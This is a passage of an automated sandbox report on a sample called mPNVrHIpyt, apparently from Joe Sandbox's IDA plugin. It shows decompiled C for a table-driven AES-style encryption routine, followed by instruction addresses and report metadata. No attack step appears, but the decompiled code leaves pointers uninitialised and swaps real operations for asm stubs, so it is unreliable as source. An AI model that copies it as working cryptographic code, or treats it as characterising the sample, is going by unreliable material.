				signed char _t736;
				signed char _t744;
				signed char _t745;
				signed char _t753;
				signed char _t754;
				signed char _t762;
				signed char _t763;
				signed char _t771;
				signed char _t772;
				signed char _t780;
				signed char _t781;
				signed char _t789;
				signed char _t797;
				signed char _t798;
				signed char _t806;
				signed char _t814;
				signed char _t815;
				signed int _t824;
				signed char _t825;
				signed char _t826;
				signed char _t827;
				signed char _t828;
				signed char _t829;
				signed char _t830;
				signed char _t831;
				signed char _t832;
				signed char _t833;
				signed char _t834;
				signed char _t835;
				signed char _t836;
				signed char _t837;
				signed char _t838;
				signed char _t839;
				signed char _t840;
				signed char _t841;
				signed char _t842;
				signed char _t843;
				signed char _t844;
				signed char _t845;
				signed char _t846;
				signed char _t847;
				signed char _t848;
				signed char _t849;
				signed int _t851;
				signed int* _t924;
				signed int* _t997;
				signed int* _t998;
				signed int* _t999;
				signed int* _t1011;
				signed int* _t1012;
				signed int* _t1024;
				signed int* _t1025;
				signed int* _t1037;
				signed int* _t1038;
				signed int* _t1050;
				signed int* _t1051;
				signed int* _t1063;
				signed int* _t1064;
				signed int* _t1076;
				signed int* _t1077;
				signed int* _t1089;
				signed int* _t1090;
				signed int* _t1102;
				signed int* _t1103;
				signed int* _t1115;
				signed int* _t1116;
				signed int* _t1128;
				signed int* _t1129;
				signed int* _t1131;
				signed int* _t1143;
				signed int* _t1144;
				signed int* _t1156;
				signed int* _t1168;
				signed int* _t1169;
				signed int** _t1181;

				_t1181[4] = _t997;
				_t1181[3] = __ebx;
				_t1181[2] = __esi;
				_t1181[1] = __edi;
				_t924 = _t1181[6];
				_t998 = _t1181[8];
				_t851 = _t998[0x3c] & 0x000000ff;
				_t514 =  *_t924 ^  *_t998;
				_t628 = _t924[1] ^ _t998[1];
				_t699 = _t924[2] ^ _t998[2];
				_t824 = _t924[3] ^ _t998[3];
				if(_t851 == 0xa0) {
					L6:
					_t999 =  &(_t998[4]);
					 *_t1181 = _t999;
					asm("rol eax, 0x10");
					_t630 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
					_t700 = _t699 >> 0x10;
					_t631 = _t630 >> 0x10;
					_t825 = _t824 >> 0x10;
					_t708 = _t999[2] ^  *(0xf69c240 + (_t699 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t628 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t514 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t825 & 0x000000ff) * 4);
					_t826 = _t999[3] ^  *(0xf69c240 + (_t824 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t699 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t514 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t631 & 0x000000ff) * 4);
					_t1011 =  *_t1181;
					_t522 =  *(0xf69ca40 + (_t700 & 0x000000ff) * 4) ^  *(0xf69c240 + (_t630 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t824 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t631 & 0x000000ff) * 4) ^  *_t1011;
					_t633 =  *(0xf69c240 + (_t628 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t630 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t700 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t825 & 0x000000ff) * 4) ^ _t1011[1];
					_t1012 =  &(_t1011[4]);
					 *_t1181 = _t1012;
					asm("rol eax, 0x10");
					_t635 = _t633 & 0xffff0000 | _t522 >> 0x00000010;
					_t709 = _t708 >> 0x10;
					_t636 = _t635 >> 0x10;
					_t827 = _t826 >> 0x10;
					_t717 = _t1012[2] ^  *(0xf69c240 + (_t708 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t633 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t522 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t827 & 0x000000ff) * 4);
					_t828 = _t1012[3] ^  *(0xf69c240 + (_t826 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t708 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t522 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t636 & 0x000000ff) * 4);
					_t1024 =  *_t1181;
					_t530 =  *(0xf69ca40 + (_t709 & 0x000000ff) * 4) ^  *(0xf69c240 + (_t635 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t826 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t636 & 0x000000ff) * 4) ^  *_t1024;
					_t638 =  *(0xf69c240 + (_t633 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t635 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t709 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t827 & 0x000000ff) * 4) ^ _t1024[1];
					_t1025 =  &(_t1024[4]);
					 *_t1181 = _t1025;
					asm("rol eax, 0x10");
					_t640 = _t638 & 0xffff0000 | _t530 >> 0x00000010;
					_t718 = _t717 >> 0x10;
					_t641 = _t640 >> 0x10;
					_t829 = _t828 >> 0x10;
					_t726 = _t1025[2] ^  *(0xf69c240 + (_t717 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t638 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t530 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t829 & 0x000000ff) * 4);
					_t830 = _t1025[3] ^  *(0xf69c240 + (_t828 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t717 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t530 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t641 & 0x000000ff) * 4);
					_t1037 =  *_t1181;
					_t538 =  *(0xf69ca40 + (_t718 & 0x000000ff) * 4) ^  *(0xf69c240 + (_t640 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t828 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t641 & 0x000000ff) * 4) ^  *_t1037;
					_t643 =  *(0xf69c240 + (_t638 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t640 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t718 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t829 & 0x000000ff) * 4) ^ _t1037[1];
					_t1038 =  &(_t1037[4]);
					 *_t1181 = _t1038;
					asm("rol eax, 0x10");
					_t645 = _t643 & 0xffff0000 | _t538 >> 0x00000010;
					_t727 = _t726 >> 0x10;
					_t646 = _t645 >> 0x10;
					_t831 = _t830 >> 0x10;
					_t735 = _t1038[2] ^  *(0xf69c240 + (_t726 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t643 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t538 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t831 & 0x000000ff) * 4);
					_t832 = _t1038[3] ^  *(0xf69c240 + (_t830 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t726 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t538 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t646 & 0x000000ff) * 4);
					_t1050 =  *_t1181;
					_t546 =  *(0xf69ca40 + (_t727 & 0x000000ff) * 4) ^  *(0xf69c240 + (_t645 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t830 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t646 & 0x000000ff) * 4) ^  *_t1050;
					_t648 =  *(0xf69c240 + (_t643 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t645 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t727 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t831 & 0x000000ff) * 4) ^ _t1050[1];
					_t1051 =  &(_t1050[4]);
					 *_t1181 = _t1051;
					asm("rol eax, 0x10");
					_t650 = _t648 & 0xffff0000 | _t546 >> 0x00000010;
					_t736 = _t735 >> 0x10;
					_t651 = _t650 >> 0x10;
					_t833 = _t832 >> 0x10;
					_t744 = _t1051[2] ^  *(0xf69c240 + (_t735 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t648 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t546 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t833 & 0x000000ff) * 4);
					_t834 = _t1051[3] ^  *(0xf69c240 + (_t832 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t735 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t546 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t651 & 0x000000ff) * 4);
					_t1063 =  *_t1181;
					_t554 =  *(0xf69ca40 + (_t736 & 0x000000ff) * 4) ^  *(0xf69c240 + (_t650 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t832 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t651 & 0x000000ff) * 4) ^  *_t1063;
					_t653 =  *(0xf69c240 + (_t648 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t650 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t736 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t833 & 0x000000ff) * 4) ^ _t1063[1];
					_t1064 =  &(_t1063[4]);
					 *_t1181 = _t1064;
					asm("rol eax, 0x10");
					_t655 = _t653 & 0xffff0000 | _t554 >> 0x00000010;
					_t745 = _t744 >> 0x10;
					_t656 = _t655 >> 0x10;
					_t835 = _t834 >> 0x10;
					_t753 = _t1064[2] ^  *(0xf69c240 + (_t744 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t653 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t554 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t835 & 0x000000ff) * 4);
					_t836 = _t1064[3] ^  *(0xf69c240 + (_t834 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t744 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t554 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t656 & 0x000000ff) * 4);
					_t1076 =  *_t1181;
					_t562 =  *(0xf69ca40 + (_t745 & 0x000000ff) * 4) ^  *(0xf69c240 + (_t655 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t834 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t656 & 0x000000ff) * 4) ^  *_t1076;
					_t658 =  *(0xf69c240 + (_t653 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t655 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t745 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t835 & 0x000000ff) * 4) ^ _t1076[1];
					_t1077 =  &(_t1076[4]);
					 *_t1181 = _t1077;
					asm("rol eax, 0x10");
					_t660 = _t658 & 0xffff0000 | _t562 >> 0x00000010;
					_t754 = _t753 >> 0x10;
					_t661 = _t660 >> 0x10;
					_t837 = _t836 >> 0x10;
					_t762 = _t1077[2] ^  *(0xf69c240 + (_t753 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t658 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t562 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t837 & 0x000000ff) * 4);
					_t838 = _t1077[3] ^  *(0xf69c240 + (_t836 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t753 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t562 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t661 & 0x000000ff) * 4);
					_t1089 =  *_t1181;
					_t570 =  *(0xf69ca40 + (_t754 & 0x000000ff) * 4) ^  *(0xf69c240 + (_t660 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t836 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t661 & 0x000000ff) * 4) ^  *_t1089;
					_t663 =  *(0xf69c240 + (_t658 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t660 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t754 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t837 & 0x000000ff) * 4) ^ _t1089[1];
					_t1090 =  &(_t1089[4]);
					 *_t1181 = _t1090;
					asm("rol eax, 0x10");
					_t665 = _t663 & 0xffff0000 | _t570 >> 0x00000010;
					_t763 = _t762 >> 0x10;
					_t666 = _t665 >> 0x10;
					_t839 = _t838 >> 0x10;
					_t771 = _t1090[2] ^  *(0xf69c240 + (_t762 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t663 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t570 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t839 & 0x000000ff) * 4);
					_t840 = _t1090[3] ^  *(0xf69c240 + (_t838 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t762 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t570 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t666 & 0x000000ff) * 4);
					_t1102 =  *_t1181;
					_t578 =  *(0xf69ca40 + (_t763 & 0x000000ff) * 4) ^  *(0xf69c240 + (_t665 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t838 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t666 & 0x000000ff) * 4) ^  *_t1102;
					_t668 =  *(0xf69c240 + (_t663 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t665 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t763 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t839 & 0x000000ff) * 4) ^ _t1102[1];
					_t1103 =  &(_t1102[4]);
					 *_t1181 = _t1103;
					asm("rol eax, 0x10");
					_t670 = _t668 & 0xffff0000 | _t578 >> 0x00000010;
					_t772 = _t771 >> 0x10;
					_t671 = _t670 >> 0x10;
					_t841 = _t840 >> 0x10;
					_t780 = _t1103[2] ^  *(0xf69c240 + (_t771 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t668 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t578 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t841 & 0x000000ff) * 4);
					_t842 = _t1103[3] ^  *(0xf69c240 + (_t840 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t771 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t578 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t671 & 0x000000ff) * 4);
					_t1115 =  *_t1181;
					_t586 =  *(0xf69ca40 + (_t772 & 0x000000ff) * 4) ^  *(0xf69c240 + (_t670 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t840 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t671 & 0x000000ff) * 4) ^  *_t1115;
					_t673 =  *(0xf69c240 + (_t668 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t670 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t772 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t841 & 0x000000ff) * 4) ^ _t1115[1];
					_t1116 =  &(_t1115[4]);
					 *_t1181 = _t1116;
					asm("rol eax, 0x10");
					_t675 = _t673 & 0xffff0000 | _t586 >> 0x00000010;
					_t781 = _t780 >> 0x10;
					_t676 = _t675 >> 0x10;
					_t843 = _t842 >> 0x10;
					_t1128 =  *_t1181;
					_t1129 = _t1181[7];
					 *_t1129 =  *(0xf69da40 + (_t781 & 0x000000ff) * 4) ^  *(0xf69d240 + (_t675 & 0x000000ff) * 4) ^  *(0xf69d640 + (_t842 & 0x000000ff) * 4) ^  *(0xf69de40 + (_t676 & 0x000000ff) * 4) ^  *_t1128;
					_t1129[1] =  *(0xf69d240 + (_t673 & 0x000000ff) * 4) ^  *(0xf69d640 + (_t675 & 0x000000ff) * 4) ^  *(0xf69de40 + (_t781 & 0x000000ff) * 4) ^  *(0xf69da40 + (_t843 & 0x000000ff) * 4) ^ _t1128[1];
					_t1129[2] = _t1116[2] ^  *(0xf69d240 + (_t780 & 0x000000ff) * 4) ^  *(0xf69d640 + (_t673 & 0x000000ff) * 4) ^  *(0xf69da40 + (_t586 & 0x000000ff) * 4) ^  *(0xf69de40 + (_t843 & 0x000000ff) * 4);
					_t1129[3] = _t1116[3] ^  *(0xf69d240 + (_t842 & 0x000000ff) * 4) ^  *(0xf69d640 + (_t780 & 0x000000ff) * 4) ^  *(0xf69de40 + (_t586 & 0x000000ff) * 4) ^  *(0xf69da40 + (_t676 & 0x000000ff) * 4);
					_t595 = 0;
				} else {
					if(_t851 == 0xc0) {
						L5:
						_t1131 =  &(_t998[4]);
						 *_t1181 = _t1131;
						asm("rol eax, 0x10");
						_t681 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
						_t789 = _t699 >> 0x10;
						_t682 = _t681 >> 0x10;
						_t844 = _t824 >> 0x10;
						_t797 = _t1131[2] ^  *(0xf69c240 + (_t699 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t628 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t514 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t844 & 0x000000ff) * 4);
						_t845 = _t1131[3] ^  *(0xf69c240 + (_t824 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t699 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t514 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t682 & 0x000000ff) * 4);
						_t1143 =  *_t1181;
						_t603 =  *(0xf69ca40 + (_t789 & 0x000000ff) * 4) ^  *(0xf69c240 + (_t681 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t824 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t682 & 0x000000ff) * 4) ^  *_t1143;
						_t684 =  *(0xf69c240 + (_t628 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t681 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t789 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t844 & 0x000000ff) * 4) ^ _t1143[1];
						_t1144 =  &(_t1143[4]);
						 *_t1181 = _t1144;
						asm("rol eax, 0x10");
						_t686 = _t684 & 0xffff0000 | _t603 >> 0x00000010;
						_t798 = _t797 >> 0x10;
						_t687 = _t686 >> 0x10;
						_t846 = _t845 >> 0x10;
						_t699 = _t1144[2] ^  *(0xf69c240 + (_t797 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t684 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t603 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t846 & 0x000000ff) * 4);
						_t824 = _t1144[3] ^  *(0xf69c240 + (_t845 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t797 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t603 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t687 & 0x000000ff) * 4);
						_t998 =  *_t1181;
						_t514 =  *(0xf69ca40 + (_t798 & 0x000000ff) * 4) ^  *(0xf69c240 + (_t686 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t845 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t687 & 0x000000ff) * 4) ^  *_t998;
						_t628 =  *(0xf69c240 + (_t684 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t686 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t798 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t846 & 0x000000ff) * 4) ^ _t998[1];
						goto L6;
					} else {
						if(_t851 == 0xe0) {
							_t1156 =  &(_t998[4]);
							 *_t1181 = _t1156;
							asm("rol eax, 0x10");
							_t690 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
							_t806 = _t699 >> 0x10;
							_t691 = _t690 >> 0x10;
							_t847 = _t824 >> 0x10;
							_t814 = _t1156[2] ^  *(0xf69c240 + (_t699 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t628 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t514 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t847 & 0x000000ff) * 4);
							_t848 = _t1156[3] ^  *(0xf69c240 + (_t824 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t699 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t514 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t691 & 0x000000ff) * 4);
							_t1168 =  *_t1181;
							_t618 =  *(0xf69ca40 + (_t806 & 0x000000ff) * 4) ^  *(0xf69c240 + (_t690 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t824 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t691 & 0x000000ff) * 4) ^  *_t1168;
							_t693 =  *(0xf69c240 + (_t628 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t690 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t806 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t847 & 0x000000ff) * 4) ^ _t1168[1];
							_t1169 =  &(_t1168[4]);
							 *_t1181 = _t1169;
							asm("rol eax, 0x10");
							_t695 = _t693 & 0xffff0000 | _t618 >> 0x00000010;
							_t815 = _t814 >> 0x10;
							_t696 = _t695 >> 0x10;
							_t849 = _t848 >> 0x10;
							_t699 = _t1169[2] ^  *(0xf69c240 + (_t814 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t693 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t618 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t849 & 0x000000ff) * 4);
							_t824 = _t1169[3] ^  *(0xf69c240 + (_t848 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t814 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t618 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t696 & 0x000000ff) * 4);
							_t998 =  *_t1181;
							_t514 =  *(0xf69ca40 + (_t815 & 0x000000ff) * 4) ^  *(0xf69c240 + (_t695 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t848 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t696 & 0x000000ff) * 4) ^  *_t998;
							_t628 =  *(0xf69c240 + (_t693 & 0x000000ff) * 4) ^  *(0xf69c640 + (_t695 & 0x000000ff) * 4) ^  *(0xf69ce40 + (_t815 & 0x000000ff) * 4) ^  *(0xf69ca40 + (_t849 & 0x000000ff) * 4) ^ _t998[1];
							goto L5;
						} else {
							_t595 = 0xffffffff;
						}
					}
				}
				return _t595;
			}

0x0f691c23
0x0f691c27
0x0f691c2b
0x0f691c2f
0x0f691c33
0x0f691c45
0x0f691c49
0x0f691c50
0x0f691c53
0x0f691c56
0x0f691c59
0x0f691c62
0x0f691fce
0x0f691fce
0x0f691fd1
0x0f691fda
0x0f69202c
0x0f69202e
0x0f692063
0x0f692066
0x0f692093
0x0f692095
0x0f692097
0x0f69209a
0x0f69209d
0x0f6920a0
0x0f6920a3
0x0f6920ac
0x0f6920fe
0x0f692100
0x0f692135
0x0f692138
0x0f692165
0x0f692167
0x0f692169
0x0f69216c
0x0f69216f
0x0f692172
0x0f692175
0x0f69217e
0x0f6921d0
0x0f6921d2
0x0f692207
0x0f69220a
0x0f692237
0x0f692239
0x0f69223b
0x0f69223e
0x0f692241
0x0f692244
0x0f692247
0x0f692250
0x0f6922a2
0x0f6922a4
0x0f6922d9
0x0f6922dc
0x0f692309
0x0f69230b
0x0f69230d
0x0f692310
0x0f692313
0x0f692316
0x0f692319
0x0f692322
0x0f692374
0x0f692376
0x0f6923ab
0x0f6923ae
0x0f6923db
0x0f6923dd
0x0f6923df
0x0f6923e2
0x0f6923e5
0x0f6923e8
0x0f6923eb
0x0f6923f4
0x0f692446
0x0f692448
0x0f69247d
0x0f692480
0x0f6924ad
0x0f6924af
0x0f6924b1
0x0f6924b4
0x0f6924b7
0x0f6924ba
0x0f6924bd
0x0f6924c6
0x0f692518
0x0f69251a
0x0f69254f
0x0f692552
0x0f69257f
0x0f692581
0x0f692583
0x0f692586
0x0f692589
0x0f69258c
0x0f69258f
0x0f692598
0x0f6925ea
0x0f6925ec
0x0f692621
0x0f692624
0x0f692651
0x0f692653
0x0f692655
0x0f692658
0x0f69265b
0x0f69265e
0x0f692661
0x0f69266a
0x0f6926bc
0x0f6926be
0x0f6926f3
0x0f6926f6
0x0f692723
0x0f692725
0x0f692727
0x0f69272a
0x0f69272d
0x0f692730
0x0f692733
0x0f69273c
0x0f69278e
0x0f692790
0x0f6927c5
0x0f6927c8
0x0f6927f5
0x0f6927fe
0x0f692802
0x0f692805
0x0f692808
0x0f69280b
0x0f69280e
0x0f691c68
0x0f691c6e
0x0f691e2a
0x0f691e2a
0x0f691e2d
0x0f691e36
0x0f691e88
0x0f691e8a
0x0f691ebf
0x0f691ec2
0x0f691eef
0x0f691ef1
0x0f691ef3
0x0f691ef6
0x0f691ef9
0x0f691efc
0x0f691eff
0x0f691f08
0x0f691f5a
0x0f691f5c
0x0f691f91
0x0f691f94
0x0f691fc1
0x0f691fc3
0x0f691fc5
0x0f691fc8
0x0f691fcb
0x00000000
0x0f691c74
0x0f691c7a
0x0f691c86
0x0f691c89
0x0f691c92
0x0f691ce4
0x0f691ce6
0x0f691d1b
0x0f691d1e
0x0f691d4b
0x0f691d4d
0x0f691d4f
0x0f691d52
0x0f691d55
0x0f691d58
0x0f691d5b
0x0f691d64
0x0f691db6
0x0f691db8
0x0f691ded
0x0f691df0
0x0f691e1d
0x0f691e1f
0x0f691e21
0x0f691e24
0x0f691e27
0x00000000
0x0f691c7c
0x0f691c7c
0x0f691c7c
0x0f691c7a
0x0f691c6e
0x0f692823

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87c360418951aa4689994ba36f32d3c9c9e0c3a39345d2a76988b820c0252e54
Instruction ID: 37b1c29327b128f131404d8de1169b142a5d2a3eb47d1078e8ba42dca24f1df6
Opcode Fuzzy Hash: 87c360418951aa4689994ba36f32d3c9c9e0c3a39345d2a76988b820c0252e54
Instruction Fuzzy Hash: C9725431C142698FDB80EF6EF4A403673E5E744333B87152AAA91AB2D1D635B630EB54

Uniqueness

Uniqueness Score: -1.00%

Function 0F691020 Relevance: .7, Instructions: 720
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0F691020(signed int* __ebx, signed int* __edi, signed int* __esi) {
				signed int _t513;
				signed char _t515;
				signed char _t516;
				signed char _t518;
				signed char _t520;
				signed char _t521;
				signed char _t523;
				signed char _t525;
				signed char _t526;
				signed char _t528;
				signed char _t530;
				signed char _t531;
				signed char _t533;
				signed char _t535;
				signed char _t536;
				signed char _t538;
				signed char _t540;
				signed char _t541;
				signed char _t543;
				signed char _t545;
				signed char _t546;
				signed char _t548;
				signed char _t550;
				signed char _t551;
				signed char _t553;
				signed char _t555;
				signed char _t556;
				signed char _t558;
				signed char _t560;
				signed char _t561;
				void* _t564;
				signed char _t566;
				signed char _t567;
				signed char _t569;
				signed char _t571;
				signed char _t572;
				signed char _t575;
				signed char _t576;
				signed char _t578;
				signed char _t580;
				signed char _t581;
				signed int _t585;
				signed char _t594;
				signed char _t603;
				signed char _t612;
				signed char _t621;
				signed char _t630;
				signed char _t639;
				signed char _t648;
				signed char _t657;
				signed char _t666;
				signed char _t685;
				signed char _t702;
				signed int _t712;
				signed char _t713;
				signed char _t714;
				signed char _t715;
				signed char _t716;
				signed char _t717;
				signed char _t718;
				signed char _t719;
				signed char _t720;
				signed char _t721;
				signed char _t722;
				signed char _t723;
				signed char _t724;
				signed char _t725;
				signed char _t726;
				signed char _t727;
				signed char _t728;
				signed char _t729;
				signed char _t730;
				signed char _t731;
				signed char _t732;
				signed char _t733;
				signed char _t734;
				signed char _t735;
				signed char _t736;
				signed char _t737;
				signed int _t739;
				signed char _t740;
				signed char _t747;
				signed char _t748;
				signed char _t755;
				signed char _t756;
				signed char _t763;
				signed char _t764;
				signed char _t771;
				signed char _t772;
				signed char _t779;
				signed char _t780;
				signed char _t787;
				signed char _t788;
				signed char _t795;
				signed char _t796;
				signed char _t803;
				signed char _t804;
				signed char _t811;
				signed char _t812;
				signed int* _t819;
				signed char _t820;
				signed char _t827;
				signed char _t828;
				signed char _t835;
				signed char _t842;
				signed char _t843;
				signed int _t851;
				signed int* _t924;
				signed int* _t996;
				signed int* _t997;
				signed int* _t998;
				signed int* _t1010;
				signed int* _t1011;
				signed int* _t1023;
				signed int* _t1024;
				signed int* _t1036;
				signed int* _t1037;
				signed int* _t1049;
				signed int* _t1050;
				signed int* _t1062;
				signed int* _t1063;
				signed int* _t1075;
				signed int* _t1076;
				signed int* _t1088;
				signed int* _t1089;
				signed int* _t1101;
				signed int* _t1102;
				signed int* _t1114;
				signed int* _t1115;
				signed int* _t1127;
				signed int* _t1129;
				signed int* _t1141;
				signed int* _t1142;
				signed int* _t1154;
				signed int* _t1166;
				signed int* _t1167;
				signed int** _t1179;

				_t1179[4] = _t996;
				_t1179[3] = __ebx;
				_t1179[2] = __esi;
				_t1179[1] = __edi;
				_t924 = _t1179[6];
				_t997 = _t1179[8];
				_t851 = _t997[0x3c] & 0x000000ff;
				_t513 =  *_t924 ^  *_t997;
				_t585 = _t924[1] ^ _t997[1];
				_t712 = _t924[2] ^ _t997[2];
				_t739 = _t924[3] ^ _t997[3];
				if(_t851 == 0xa0) {
					L6:
					_t998 =  &(_t997[4]);
					 *_t1179 = _t998;
					asm("rol ebx, 0x10");
					_t515 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
					_t740 = _t739 >> 0x10;
					_t516 = _t515 >> 0x10;
					_t713 = _t712 >> 0x10;
